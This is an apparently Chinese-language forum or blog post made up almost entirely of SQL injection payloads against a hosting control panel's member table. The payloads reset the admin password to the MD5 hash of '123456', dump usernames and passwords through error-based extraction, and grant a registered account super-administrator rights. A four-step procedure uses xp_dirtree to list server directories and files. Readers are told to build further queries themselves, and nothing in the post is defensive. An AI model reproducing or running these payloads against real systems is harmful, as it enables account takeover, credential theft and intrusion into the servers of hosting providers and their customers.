123' UPDATE [memlst] SET u_pss='e10adc3949ba59abbe56e057f20f883e' WHERE u_nme='admin'--
123' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and '1'='1
可以同时爆出一个用户的帐号和密码。想爆出其他用户的语句自己构造吧。
123' UPDATE [memlst] SET u_sys=6 WHERE u_nme='你注册的用户名'--
123' UPDATE [memlst] SET u_pwr=2 WHERE u_nme='你注册的用户名'--
这2句话就能够提升自己为超级管理员
爆路径语句
第一步:建立表123' ;drop table foofoofoo;create table foofoofoo([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1
第二步:123' ;declare @z nvarchar(4000) set @z=0x63003a005c00 insert foofoofoo execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = C:\ 为sql ENCODE
其他的自己找工具去转吧!
第三步:暴出总数 123' and (select cast(count(*) as varchar(8000))+char(94) from foofoofoo)>0-- and '1'='1
第四步:暴出你想要的文件夹名字和文件名字 123' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top 1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)-- and '1'='1
修改中间红色的1,依次爆出。
京公网安备 11010502034610号
暂无评论